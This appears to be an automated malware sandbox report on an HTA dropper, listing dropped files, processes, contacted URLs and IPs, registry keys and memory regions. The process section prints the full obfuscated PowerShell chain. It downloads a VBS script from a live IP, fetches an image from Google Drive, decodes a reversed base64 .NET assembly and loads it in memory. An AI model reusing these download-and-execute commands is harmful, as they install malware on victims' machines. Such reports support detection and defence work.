Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
seethebestthingsevermeetwithgreatthingstobegood.hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\logisticthingswithgoodthingsgivenbest[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESC7DB.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Fri Oct 25 10:27:16 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tahbedb.btd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vo1jysh.wms.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aijqtqqd.zps.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3vyzhjw.k5k.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilisadwp.ayg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kevtdmyr.5ya.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vx1mvpit.1gm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2tfq3nx.zhd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyyomb2p.ie1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrdhnjul.sld.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\c0m0n3e0\CSC399845D2C88840F7A4BEE62F5A991150.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
|
modified
|
There are 10 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\seethebestthingsevermeetwithgreatthingstobegood.hta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex
ByPasS -NoP -w 1
-c DEViCeCREdentialDEpLoyMEnt ;
IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent
= New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag
= rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex
= Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length
= Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed
= -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes
= [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod
= [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+',
rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124)
|. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7DB.tmp"
"c:\Users\user\AppData\Local\Temp\c0m0n3e0\CSC399845D2C88840F7A4BEE62F5A991150.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://drive.go
|
unknown
|
||
http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF
|
192.3.176.141
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://www.microsoft.2
|
unknown
|
||
http://drive.usercontent.google.com
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://www.microsoft.
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://aka..winsvr
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://drive.usercontent.googleX
|
unknown
|
||
http://crl.micro
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://drive.google.com
|
unknown
|
||
https://drive.usercontent.google.com
|
unknown
|
||
http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIFp6ZT
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
drive.google.com
|
142.250.185.142
|
||
drive.usercontent.google.com
|
142.250.185.193
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.3.176.141
|
unknown
|
United States
|
||
142.250.185.142
|
drive.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7CC0000
|
trusted library allocation
|
page read and write
|
||
6A20000
|
heap
|
page read and write
|
||
27ED000
|
heap
|
page read and write
|
||
7C4D000
|
trusted library allocation
|
page read and write
|
||
2774000
|
heap
|
page read and write
|
||
6D1F000
|
stack
|
page read and write
|
||
85F0000
|
heap
|
page read and write
|
||
4E34000
|
heap
|
page read and write
|
||
7280000
|
trusted library allocation
|
page read and write
|
||
27F1000
|
heap
|
page read and write
|
||
6890000
|
trusted library allocation
|
page read and write
|
||
2D96000
|
heap
|
page read and write
|
||
322E000
|
stack
|
page read and write
|
||
76CE000
|
stack
|
page read and write
|
||
79C1000
|
heap
|
page read and write
|
||
62BA000
|
heap
|
page read and write
|
||
4A1E000
|
stack
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
6F83000
|
heap
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
6C1B000
|
heap
|
page read and write
|
||
700D000
|
heap
|
page read and write
|
||
711C000
|
heap
|
page read and write
|
||
A30000
|
heap
|
page read and write
|
||
493F000
|
stack
|
page read and write
|
||
72C0000
|
heap
|
page execute and read and write
|
||
6F26000
|
heap
|
page read and write
|
||
4B33000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
stack
|
page read and write
|
||
710D000
|
heap
|
page read and write
|
||
7400000
|
trusted library allocation
|
page read and write
|
||
76CE000
|
stack
|
page read and write
|
||
27FE000
|
heap
|
page read and write
|
||
5B79000
|
trusted library allocation
|
page read and write
|
||
722E000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
6FA1000
|
heap
|
page read and write
|
||
3100000
|
heap
|
page read and write
|
||
51D000
|
stack
|
page read and write
|
||
6FA8000
|
heap
|
page read and write
|
||
6F26000
|
heap
|
page read and write
|
||
503E000
|
stack
|
page read and write
|
||
4DF0000
|
heap
|
page execute and read and write
|
||
6F1C000
|
heap
|
page read and write
|
||
30D0000
|
heap
|
page read and write
|
||
6F52000
|
heap
|
page read and write
|
||
6730000
|
heap
|
page read and write
|
||
3374000
|
trusted library allocation
|
page read and write
|
||
700E000
|
stack
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
4E60000
|
heap
|
page read and write
|
||
4CBE000
|
stack
|
page read and write
|
||
6337000
|
heap
|
page read and write
|
||
6FB7000
|
heap
|
page read and write
|
||
6FAC000
|
heap
|
page read and write
|
||
AAE000
|
stack
|
page read and write
|
||
4B71000
|
trusted library allocation
|
page read and write
|
||
2DF8000
|
heap
|
page read and write
|
||
27EA000
|
heap
|
page read and write
|
||
3050000
|
heap
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
4AAC000
|
heap
|
page read and write
|
||
5050000
|
heap
|
page read and write
|
||
6FA1000
|
heap
|
page read and write
|
||
634A000
|
trusted library allocation
|
page read and write
|
||
6FA3000
|
heap
|
page read and write
|
||
2FFA000
|
heap
|
page read and write
|
||
4820000
|
heap
|
page read and write
|
||
6B68000
|
heap
|
page read and write
|
||
6FA1000
|
heap
|
page read and write
|
||
4859000
|
heap
|
page read and write
|
||
2806000
|
heap
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
4A93000
|
heap
|
page read and write
|
||
734F000
|
stack
|
page read and write
|
||
90E000
|
stack
|
page read and write
|
||
2802000
|
heap
|
page read and write
|
||
4AC8000
|
heap
|
page read and write
|
||
4BFF000
|
stack
|
page read and write
|
||
4B83000
|
heap
|
page read and write
|
||
6FA1000
|
heap
|
page read and write
|
||
2FA3000
|
heap
|
page read and write
|
||
4B4E000
|
stack
|
page read and write
|
||
6FB7000
|
heap
|
page read and write
|
||
4BA4000
|
heap
|
page read and write
|
||
49DE000
|
stack
|
page read and write
|
||
8311000
|
trusted library allocation
|
page read and write
|
||
6AC8000
|
heap
|
page read and write
|
||
731E000
|
stack
|
page read and write
|
||
2C7C000
|
stack
|
page read and write
|
||
624F000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
4C10000
|
heap
|
page readonly
|
||
A70000
|
heap
|
page read and write
|
||
72EF000
|
stack
|
page read and write
|
||
9F0000
|
trusted library allocation
|
page read and write
|
||
2AEA000
|
stack
|
page read and write
|
||
2804000
|
heap
|
page read and write
|
||
5B36000
|
trusted library allocation
|
page read and write
|
||
2FA1000
|
heap
|
page read and write
|
||
3098000
|
stack
|
page read and write
|
||
6F66000
|
heap
|
page read and write
|
||
73DD000
|
stack
|
page read and write
|
||
7B2E000
|
stack
|
page read and write
|
||
629A000
|
heap
|
page read and write
|
||
73D0000
|
trusted library allocation
|
page read and write
|
||
274B000
|
heap
|
page read and write
|
||
6F26000
|
heap
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
4862000
|
heap
|
page read and write
|
||
4C26000
|
trusted library allocation
|
page read and write
|
||
786E000
|
heap
|
page read and write
|
||
3000000
|
heap
|
page read and write
|
||
2742000
|
heap
|
page read and write
|
||
73B0000
|
trusted library allocation
|
page read and write
|
||
6F7F000
|
heap
|
page read and write
|
||
A60000
|
trusted library allocation
|
page read and write
|
||
484D000
|
heap
|
page read and write
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
277F000
|
heap
|
page read and write
|
||
4800000
|
heap
|
page read and write
|
||
8AE0000
|
trusted library allocation
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
4B18000
|
heap
|
page read and write
|
||
70B6000
|
heap
|
page read and write
|
||
19B000
|
stack
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
8B00000
|
trusted library allocation
|
page read and write
|
||
4C28000
|
trusted library allocation
|
page read and write
|
||
6FA8000
|
heap
|
page read and write
|
||
6FAC000
|
heap
|
page read and write
|
||
7698000
|
heap
|
page read and write
|
||
4A7D000
|
stack
|
page read and write
|
||
27DD000
|
heap
|
page read and write
|
||
8630000
|
trusted library allocation
|
page read and write
|
||
67CE000
|
stack
|
page read and write
|
||
6530000
|
trusted library allocation
|
page read and write
|
||
6258000
|
heap
|
page read and write
|
||
5F35000
|
trusted library allocation
|
page read and write
|
||
7879000
|
heap
|
page read and write
|
||
7FCE000
|
stack
|
page read and write
|
||
8058000
|
heap
|
page read and write
|
||
7FA80000
|
trusted library allocation
|
page execute and read and write
|
||
6E10000
|
heap
|
page read and write
|
||
6D11000
|
heap
|
page read and write
|
||
49D000
|
stack
|
page read and write
|
||
2774000
|
heap
|
page read and write
|
||
62B7000
|
heap
|
page read and write
|
||
48AD000
|
stack
|
page read and write
|
||
6BAE000
|
stack
|
page read and write
|
||
6E20000
|
heap
|
page read and write
|
||
494F000
|
stack
|
page read and write
|
||
6FBC000
|
heap
|
page read and write
|
||
2FFF000
|
heap
|
page read and write
|
||
634C000
|
trusted library allocation
|
page read and write
|
||
4840000
|
heap
|
page read and write
|
||
2FFE000
|
heap
|
page read and write
|
||
5950000
|
heap
|
page read and write
|
||
544E000
|
trusted library allocation
|
page read and write
|
||
44CE000
|
stack
|
page read and write
|
||
6FC1000
|
heap
|
page read and write
|
||
2720000
|
heap
|
page read and write
|
||
8610000
|
trusted library allocation
|
page read and write
|
||
6F58000
|
heap
|
page read and write
|
||
792F000
|
heap
|
page read and write
|
||
6F93000
|
heap
|
page read and write
|
||
45EE000
|
stack
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
8E4C000
|
stack
|
page read and write
|
||
AC0000
|
trusted library allocation
|
page execute and read and write
|
||
5EF9000
|
trusted library allocation
|
page read and write
|
||
71AA000
|
heap
|
page read and write
|
||
4A9C000
|
heap
|
page read and write
|
||
7290000
|
trusted library allocation
|
page read and write
|
||
62B5000
|
heap
|
page read and write
|
||
6FA3000
|
heap
|
page read and write
|
||
3420000
|
heap
|
page read and write
|
||
53E0000
|
heap
|
page read and write
|
||
302F000
|
heap
|
page read and write
|
||
774E000
|
stack
|
page read and write
|
||
4B98000
|
heap
|
page read and write
|
||
7166000
|
heap
|
page read and write
|
||
8C55000
|
trusted library allocation
|
page read and write
|
||
6F8E000
|
heap
|
page read and write
|
||
6F8E000
|
stack
|
page read and write
|
||
57C000
|
stack
|
page read and write
|
||
7EC0000
|
trusted library allocation
|
page read and write
|
||
6284000
|
heap
|
page read and write
|
||
7410000
|
trusted library allocation
|
page read and write
|
||
2D20000
|
heap
|
page read and write
|
||
6958000
|
trusted library allocation
|
page read and write
|
||
6FA3000
|
heap
|
page read and write
|
||
6F6A000
|
heap
|
page read and write
|
||
7460000
|
trusted library allocation
|
page read and write
|
||
5273000
|
trusted library allocation
|
page read and write
|
||
484F000
|
heap
|
page read and write
|
||
6FB7000
|
heap
|
page read and write
|
||
629A000
|
heap
|
page read and write
|
||
D68000
|
heap
|
page read and write
|
||
5401000
|
heap
|
page read and write
|
||
4965000
|
heap
|
page read and write
|
||
2EA0000
|
heap
|
page read and write
|
||
6C4A000
|
stack
|
page read and write
|
||
6E2E000
|
stack
|
page read and write
|
||
6253000
|
heap
|
page read and write
|
||
51CD000
|
trusted library allocation
|
page read and write
|
||
2804000
|
heap
|
page read and write
|
||
27EB000
|
heap
|
page read and write
|
||
4B98000
|
heap
|
page read and write
|
||
11B0000
|
heap
|
page read and write
|
||
6FBC000
|
heap
|
page read and write
|
||
8056000
|
heap
|
page read and write
|
||
62B4000
|
heap
|
page read and write
|
||
6F52000
|
heap
|
page read and write
|
||
3102000
|
heap
|
page read and write
|
||
6FD0000
|
heap
|
page read and write
|
||
4AD1000
|
trusted library allocation
|
page read and write
|
||
498E000
|
stack
|
page read and write
|
||
80CE000
|
stack
|
page read and write
|
||
327F000
|
stack
|
page read and write
|
||
6F82000
|
heap
|
page read and write
|
||
6245000
|
heap
|
page read and write
|
||
4B50000
|
trusted library allocation
|
page read and write
|
||
6F9A000
|
heap
|
page read and write
|
||
6FA8000
|
heap
|
page read and write
|
||
751B000
|
stack
|
page read and write
|
||
4C7E000
|
stack
|
page read and write
|
||
6254000
|
heap
|
page read and write
|
||
5C72000
|
trusted library allocation
|
page read and write
|
||
2815000
|
heap
|
page read and write
|
||
3056000
|
heap
|
page read and write
|
||
78E2000
|
heap
|
page read and write
|
||
2742000
|
heap
|
page read and write
|
||
4877000
|
heap
|
page read and write
|
||
2B65000
|
trusted library allocation
|
page execute and read and write
|
||
4B83000
|
heap
|
page read and write
|
||
4620000
|
heap
|
page read and write
|
||
32DE000
|
stack
|
page read and write
|
||
2C98000
|
heap
|
page read and write
|
||
62B4000
|
heap
|
page read and write
|
||
77D4000
|
heap
|
page read and write
|
||
62F9000
|
heap
|
page read and write
|
||
6FC1000
|
heap
|
page read and write
|
||
3360000
|
trusted library allocation
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
6F9F000
|
heap
|
page read and write
|
||
7163000
|
heap
|
page read and write
|
||
883C000
|
stack
|
page read and write
|
||
529E000
|
stack
|
page read and write
|
||
A0D000
|
trusted library allocation
|
page execute and read and write
|
||
4DEB000
|
trusted library allocation
|
page read and write
|
||
6D11000
|
heap
|
page read and write
|
